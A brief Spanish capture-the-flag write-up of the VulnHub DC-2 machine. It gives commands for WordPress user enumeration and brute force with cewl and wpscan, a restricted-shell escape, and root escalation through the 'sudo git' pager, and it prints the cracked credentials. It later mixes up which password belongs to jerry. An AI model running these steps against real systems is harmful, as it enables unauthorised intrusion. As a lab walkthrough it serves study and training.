DC-2 - VulnHub

// CLASSIFIED OPERATION REPORT //

DC-2 - VulnHub

Diccionario contextual con cewl, escape de rbash y sudo git para llegar a root.

VULNHUB EASY 12 de junio de 2024
#WordPress#cewl#rbash escape#sudo git#Linux
Realizado en entornos autorizados. Solo con fines educativos.

DC-2 enseña un principio muy útil en pentesting: cuando las wordlists genéricas fallan, el propio sitio es la mejor fuente de palabras.

Servicios: 80 WordPress 4.7.10 · 7744 SSH

1. Diccionario contextual + fuerza bruta

wpscan enumera los usuarios (admin, jerry, tom). La primera flag sugiere generar el diccionario a partir del contenido del sitio con cewl:

cewl http://dc-2 -w p.txt
wpscan --url http://dc-2 -U u.txt -P p.txt
# jerry:adipiscing · tom:parturient

2. Escape de rbash

El acceso ssh tom@target -p 7744 cae en una rbash (shell restringida). Escapamos ampliando el PATH y usando binarios permitidos:

# desde el prompt restringido
export PATH=$PATH:/bin:/usr/bin
# vi también permite leer flags y ejecutar comandos con :!cmd

3. Escalada — sudo git

su jerry (contraseña parturient) y revisamos sudo -l: jerry puede ejecutar git como root. Vía GTFOBins, el paginador de git nos da shell:

sudo git -p help config
!/bin/sh   # → root

Conceptos aplicados

  • cewl para diccionarios a medida del objetivo.
  • rbash escape vía PATH / editores.
  • sudo git — abuso del paginador (!sh).